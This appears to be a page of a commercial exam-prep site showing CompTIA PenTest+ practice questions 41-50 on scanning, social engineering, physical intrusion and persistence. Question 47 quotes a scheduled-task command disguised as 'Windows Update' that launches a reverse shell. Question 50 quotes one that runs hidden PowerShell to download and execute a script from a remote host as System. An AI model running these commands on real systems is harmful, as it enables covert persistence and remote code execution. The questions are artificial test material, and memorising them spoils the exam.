Pre-Summer Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 5 out of 10 pages
Viewing questions 41-50 out of questions
Questions # 41:

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

Question # 41

Question # 41

Question # 41

Question # 41

Question # 41


Expert Solution
Questions # 42:

A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester perform?

Options:

A.

Phishing


B.

Tailgating


C.

Whaling


D.

Spear phishing


Expert Solution
Questions # 43:

A tester runs an Nmap scan against a Windows server and receives the following results:

Nmap scan report for win_dns.local (10.0.0.5)

Host is up (0.014s latency)

Port State Service

53/tcp open domain

161/tcp open snmp

445/tcp open smb-ds

3389/tcp open rdp

Which of the following TCP ports should be prioritized for using hash-based relays?

Options:

A.

53


B.

161


C.

445


D.

3389


Expert Solution
Questions # 44:

A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?

Options:

A.

Clone badge information in public areas of the facility to gain access to restricted areas.


B.

Tailgate into the facility during a very busy time to gain initial access.


C.

Pick the lock on the rear entrance to gain access to the facility and try to gain access.


D.

Drop USB devices with malware outside of the facility in order to gain access to internal machines.


Expert Solution
Questions # 45:

Which of the following can an access control vestibule help deter?

Options:

A.

USB drops


B.

Badge cloning


C.

Lock picking


D.

Tailgating


Expert Solution
Questions # 46:

During a security assessment, a penetration tester captures plaintext login credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access.

Which of the following tools is the tester using?

Options:

A.

Burp Suite


B.

Wireshark


C.

Zed Attack Proxy (ZAP)


D.

Metasploit


Expert Solution
Questions # 47:

During an assessment, a penetration tester gains access to one of the internal hosts. Given the following command:

schtasks /create /sc onlogon /tn " Windows Update " /tr " cmd.exe /c reverse_shell.exe "

Which of the following is the penetration tester trying to do with this code?

Options:

A.

Enumerate the scheduled tasks


B.

Establish persistence


C.

Deactivate the Windows Update functionality


D.

Create a binary application for Windows System Updates


Expert Solution
Questions # 48:

A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested. Which of the following should the tester do next?

Options:

A.

Report the finding.


B.

Analyze the finding.


C.

Remove the threat.


D.

Document the finding and continue testing.


Expert Solution
Questions # 49:

While performing reconnaissance, a penetration tester attempts to identify publicly accessible ICS (Industrial Control Systems) and IoT (Internet of Things) systems. Which of the following tools is most effective for this task?

Options:

A.

theHarvester


B.

Shodan


C.

Amass


D.

Nmap


Expert Solution
Questions # 50:

A tester obtained access to a computer using a SMB exploit and now has a shell access into the target computer. The tester runs the following on the obtained shell:

schtasks /create /tn Updates /tr " C:\windows\syswow64\Windows\WindowsPowerShell\v1.0\powershell.exe hidden -NoLogo -NonInteractive -ep bypass -nop -c ' IEX ((new-object net.webclient).downloadstring( ' http://10.10.1.2/asd ' )) ' " /sc onlogon /ru System

Which of the following does this action accomplish?

Options:

A.

Upgrades the shell performing a privilege escalation activity


B.

Uses the Windows Update service to move the shell connection and avoid detection


C.

Maintains access into the compromised computer


D.

Forwards all the communication from the compromised host to the host 10.10.1.2


Expert Solution
Viewing page 5 out of 10 pages
Viewing questions 41-50 out of questions